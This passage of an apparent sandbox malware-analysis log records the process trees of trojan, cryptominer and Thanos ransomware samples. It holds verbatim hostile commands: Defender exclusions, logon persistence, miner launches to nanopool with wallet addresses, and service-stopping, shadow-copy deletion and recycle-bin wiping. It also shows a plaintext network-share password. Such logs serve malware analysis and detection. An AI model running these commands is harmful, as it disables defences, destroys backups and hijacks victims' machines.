- Command and Scripting Interpreter: PowerShell
PID:10032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Command and Scripting Interpreter: PowerShell
PID:10180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Command and Scripting Interpreter: PowerShell
PID:7808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' & exit6⤵PID:2068
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:13996
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"6⤵PID:10228
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit7⤵PID:14756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'8⤵
- Command and Scripting Interpreter: PowerShell
PID:11048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
- Command and Scripting Interpreter: PowerShell
PID:10136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵
- Command and Scripting Interpreter: PowerShell
PID:2416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
- Command and Scripting Interpreter: PowerShell
PID:10060
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-e --pool=stratum://`0x13e0645bfddce753e3abd8ebb53d0e14a2b20679`@eth-asia1.nanopool.org:9999/Worker1/[email protected] --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=5 --cinit-idle-gpu=100 --cinit-stealth --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6KpWXBJVkSnBwhyZxhKYXiZCfnSNXnpjqci0VX+IJvTQ"6⤵PID:14944
-
-
-
-
C:\Users\Admin\AppData\Roaming\Organizer .exe"C:\Users\Admin\AppData\Roaming\Organizer .exe"4⤵PID:1772
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit5⤵PID:7792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'6⤵
- Command and Scripting Interpreter: PowerShell
PID:7272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Command and Scripting Interpreter: PowerShell
PID:11968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Command and Scripting Interpreter: PowerShell
PID:11524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Command and Scripting Interpreter: PowerShell
PID:14728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit5⤵PID:1116
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:12764
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:11480
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit6⤵PID:5504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'7⤵
- Command and Scripting Interpreter: PowerShell
PID:13228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Command and Scripting Interpreter: PowerShell
PID:12504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Command and Scripting Interpreter: PowerShell
PID:12452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Command and Scripting Interpreter: PowerShell
PID:11444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"5⤵PID:11808
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit6⤵PID:10640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'7⤵
- Command and Scripting Interpreter: PowerShell
PID:11148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Command and Scripting Interpreter: PowerShell
PID:13676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Command and Scripting Interpreter: PowerShell
PID:9276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit6⤵PID:5648
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:13556
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵PID:8092
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit7⤵PID:12300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'8⤵
- Command and Scripting Interpreter: PowerShell
PID:10224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
- Command and Scripting Interpreter: PowerShell
PID:6556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵
- Command and Scripting Interpreter: PowerShell
PID:4832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
- Command and Scripting Interpreter: PowerShell
PID:10604
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=49RE3pc57ThMmHrqBVFdfY6qNDj2EES4fViJKeDDTgqmiUK31Ek2HBrTgqpwJNgGuP6tJXMWopW6dAbtKCCYzqft7FrQGJs.Worker2/[email protected] --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6KVQdPOzfSkdGJPNyRUeHaXewcNeUcZ816k/EVEKe6kH" --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=90 --tls --cinit-stealth6⤵PID:7388
-
-
-
-
C:\Users\Admin\AppData\Roaming\Reg Organizer 8.70.exe"C:\Users\Admin\AppData\Roaming\Reg Organizer 8.70.exe"4⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\is-EBUUF.tmp\Reg Organizer 8.70.tmp"C:\Users\Admin\AppData\Local\Temp\is-EBUUF.tmp\Reg Organizer 8.70.tmp" /SL5="$70312,22787799,64512,C:\Users\Admin\AppData\Roaming\Reg Organizer 8.70.exe"5⤵PID:6744
-
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan.MSIL.Cryptos.gen-c0d97d65dff44cb68b4f3dbc94e2824f953dba62090277cec2c75751be603ee7.exeHEUR-Trojan.MSIL.Cryptos.gen-c0d97d65dff44cb68b4f3dbc94e2824f953dba62090277cec2c75751be603ee7.exe3⤵PID:5956
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"4⤵PID:6432
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"5⤵PID:6380
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"6⤵PID:4368
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"7⤵PID:7936
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"8⤵PID:5288
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"9⤵PID:7988
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"10⤵PID:8100
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"11⤵PID:8740
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"12⤵PID:5520
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"13⤵PID:5848
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"14⤵PID:8284
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"15⤵PID:4576
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"16⤵PID:9004
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"17⤵PID:2164
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"18⤵PID:3168
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"19⤵PID:1568
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"20⤵PID:14224
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"21⤵PID:6408
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"22⤵PID:8916
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"23⤵PID:14756
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"24⤵PID:1880
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"25⤵PID:1292
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"26⤵PID:8036
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"27⤵PID:14340
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"28⤵PID:4564
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"29⤵PID:14980
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"30⤵PID:10356
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"31⤵PID:8984
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"32⤵PID:11120
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"33⤵PID:15272
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"34⤵PID:5628
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"35⤵PID:14296
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"36⤵PID:4484
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"37⤵PID:9788
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"38⤵PID:12472
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"39⤵PID:8004
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"40⤵PID:13152
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"41⤵PID:5860
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"42⤵PID:844
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"43⤵PID:8308
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"44⤵PID:11956
-
C:\Users\Admin\AppData\Local\Tempserver.exe"C:\Users\Admin\AppData\Local\Tempserver.exe"45⤵PID:13236
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Tempserver.exe"46⤵PID:14740
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.MSIL.Thanos.e-b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.exeTrojan-Ransom.MSIL.Thanos.e-b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.exe3⤵PID:6928
-
C:\Users\Admin\Desktop\00440\file.exe"file.exe"4⤵PID:1192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose5⤵PID:7556
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y5⤵PID:8736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y6⤵PID:5732
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y5⤵PID:9852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y6⤵PID:8040
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y5⤵PID:11648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y6⤵PID:4880
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y5⤵PID:11828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y6⤵PID:4856
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y5⤵PID:12988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y6⤵PID:13984
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y5⤵PID:3280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y6⤵PID:10072
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y5⤵PID:8968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y6⤵PID:10988
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y5⤵PID:9412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y6⤵PID:4672
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y5⤵PID:6116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y6⤵PID:13076
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y5⤵PID:8504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y6⤵PID:14016
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y5⤵PID:9800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y6⤵PID:8636
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y5⤵PID:9132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y6⤵PID:8892
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y5⤵PID:10312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y6⤵PID:1704
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y5⤵PID:4008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y6⤵PID:11392
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y5⤵PID:11312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y6⤵PID:7624
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y5⤵PID:15064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y6⤵PID:11884
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y5⤵PID:7424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y6⤵PID:10232
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y5⤵PID:14532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y6⤵PID:10932
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y5⤵PID:12612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y6⤵PID:1220
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y5⤵PID:13252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y6⤵PID:8584
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled5⤵
- Launches sc.exe
PID:13760
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled5⤵
- Launches sc.exe
PID:12172
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled5⤵
- Launches sc.exe
PID:11568
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled5⤵
- Launches sc.exe
PID:6216
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F5⤵
- Kills process with taskkill
PID:5956
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F5⤵
- Kills process with taskkill
PID:14876
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F5⤵
- Kills process with taskkill
PID:12376
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:6660
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB5⤵
- Interacts with shadow copies
PID:13528
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded5⤵
- Interacts with shadow copies
PID:7848
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB5⤵
- Interacts with shadow copies
PID:3772
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded5⤵
- Interacts with shadow copies
PID:3432
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB5⤵
- Interacts with shadow copies
PID:13068
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded5⤵
- Interacts with shadow copies
PID:14320
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB5⤵
- Interacts with shadow copies
PID:12764
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded5⤵
- Interacts with shadow copies
PID:9884
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB5⤵
- Interacts with shadow copies
PID:8880
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded5⤵
- Interacts with shadow copies
PID:12756
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB5⤵
- Interacts with shadow copies
PID:13324
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded5⤵
- Interacts with shadow copies
PID:14912
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:8188
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin5⤵PID:6544
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.1.32 /USER:SHJPOLICE\amer !Omar20125⤵PID:15136
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.ahhz-32599d9e9b44402ddd9c954b72bdbf35563460d551ef3c12564a280dbf5127c9.exeTrojan-Ransom.Win32.Blocker.ahhz-32599d9e9b44402ddd9c954b72bdbf35563460d551ef3c12564a280dbf5127c9.exe3⤵PID:5148
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.ahhz-32599d9e9b44402ddd9c954b72bdbf35563460d551ef3c12564a280dbf5127c9.bat4⤵PID:8868
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.basg-487b9dde33335e2719e14e2a779478ecb3cb3e58f77b7a5b028a3458184cfc15.exeTrojan-Ransom.Win32.Blocker.basg-487b9dde33335e2719e14e2a779478ecb3cb3e58f77b7a5b028a3458184cfc15.exe3⤵PID:6672
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.dutm-a4362b9d1023b1d7b6bfd3dde832f5816a20e0b44a6e0c9357626105cce284b4.exeTrojan-Ransom.Win32.Blocker.dutm-a4362b9d1023b1d7b6bfd3dde832f5816a20e0b44a6e0c9357626105cce284b4.exe3⤵PID:6004
-
C:\ProgramData\win.exe"C:\ProgramData\win.exe"4⤵PID:5220
-
C:\Windows\SYSTEM32\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\win.exe" "win.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7744
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.gejw-d691b896c1ff55994ce919df25f175ed8e1b990c85dba4e319ebc2d9af16f52c.exeTrojan-Ransom.Win32.Blocker.gejw-d691b896c1ff55994ce919df25f175ed8e1b990c85dba4e319ebc2d9af16f52c.exe3⤵PID:7896
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"4⤵PID:6448
-
C:\Windows\SYSTEM32\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:8588
-
-
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.giug-3490ad5f98836976caf442afb1b2d03d8f7df80925b77b198a5e3f063dcb731a.exeTrojan-Ransom.Win32.Blocker.giug-3490ad5f98836976caf442afb1b2d03d8f7df80925b77b198a5e3f063dcb731a.exe3⤵PID:3924
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.gyoq-5f6b76c7191dbfea800aa2404e294139a05e0abc8019c928e8a582896994167f.exeTrojan-Ransom.Win32.Blocker.gyoq-5f6b76c7191dbfea800aa2404e294139a05e0abc8019c928e8a582896994167f.exe3⤵PID:6264
-
-
C:\Users\Admin\Desktop\00440\Trojan-Ransom.Win32.Blocker.kpuo-cec255c2e44e35ffe7cfd81ebed766e37da4e8a95185610f133f3420ec3c7805.exeTrojan-Ransom.Win32.Blocker.kpuo-cec255c2e44e35ffe7cfd81ebed766e37da4e8a95185610f133f3420ec3c7805.exe3⤵PID:10616
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵PID:14828
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵PID:6768
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵PID:9564
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵PID:6308
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵PID:12940
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵PID:8228
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵PID:11068
-
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵PID:15172
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵PID:6624
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵PID:8684
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵PID:11980
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵PID:14696
-
-
